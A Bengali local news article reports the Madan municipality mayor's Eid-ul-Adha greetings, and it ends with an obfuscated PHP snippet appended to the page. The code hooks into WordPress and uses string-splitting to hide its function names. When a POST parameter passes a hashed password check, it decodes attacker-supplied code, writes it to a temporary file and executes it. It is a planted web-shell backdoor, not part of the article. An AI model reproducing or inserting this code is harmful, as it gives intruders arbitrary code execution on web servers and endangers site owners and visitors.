|

পবিত্র ঈদ-উল আযহা শুভেচ্ছা জানিয়েছেন মদন পৌর মেয়র সাইফুল ইসলাম সাইফ

প্রকাশিতঃ 4:06 pm | June 16, 2024

পবিত্র ঈদ-উল আযহা শুভেচ্ছা জানিয়েছেন মদন পৌর মেয়র সাইফুল ইসলাম সাইফ।

শহীদুল ইসলাম নেত্রকোনা প্রতিনিধিঃ নেত্রকোনা মদন পৌরবাসীসহ সর্বস্তরের জনগণকে পবিত্র ঈদু-উল আযহার শুভেচ্ছা জানিয়েছেন বাংলাদেশ আওয়ামী যুবলীগের কেন্দ্রীয় কমিটির সহ সম্পাদক ও মদন পৌরসভার মেয়র মোঃ সাইফুল ইসলাম সাইফ।

তিনি শুভেচ্ছা বার্তায় বলেন,মুসলমানদের সবচেয়ে বড় ধর্মীয় উৎসব পবিত্র ঈদুল আযহা নিয়ে আসক আনন্দ বার্তা। ভোগে সুখ নেই,ত্যাগেই প্রকৃত সুখ। ঈদ-উল আযহার এই দিনে প্রতিটি কোরবানি হোক মহান আল্লাহ সন্তুষ্টির লক্ষ্যে। মোঃ সাইফুল ইসলাম সাইফ বলেন,শুধু পশু কোরবানি নয়,কোরবানি হোক সকল অসমতা, হিংসা বিদ্বেষের জেগে উঠুক মানবতা,পারস্পরিক সম্প্রীতি। ধনী-গরীব নির্বিশেষে সকল মুসলমান যেন ঈদের আনন্দ সমান ভাবে ভাগা ভাগি করে এ প্রত্যাশা করি।

তিনি আরও বলেন,পবিত্র ঈদ-উল আযহা সুমহান ত্যাগের মহিমায় এক অনন্য দৃষ্টান্ত। কোরবানির মধ্য দিয়ে আল্লাহর প্রতি ত্যাগের মহান আদর্শ স্থাপিত হয় এই কামনায়।

পবিত্র ঈদ-উল আযহা উপলক্ষে মদন পৌরসভাসহ দেশে বিদেশে অবস্থানরত আমার সকল শুভাকাঙ্ক্ষী, শুভানুধ্যায়ী, সাংবাদিক ও সুধী মহলসহ সকল পেশাজীবি মানুষের প্রতি জানাচ্ছি অকৃত্রিম ভালোবাসা,শুভেচ্ছা অভিনন্দন। পরিশেষে তিনি বঙ্গবন্ধুর শেখ মুজিবুর রহমানের সুযোগ্য কন্যা মাননীয় প্রধানমন্ত্রী জননেত্রী শেখ হাসিনার সুস্বাস্থ্য ও দীর্ঘায়ু কামনা করে দেশবাসীর নিকট দোয়া প্রার্থনা করেন।

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}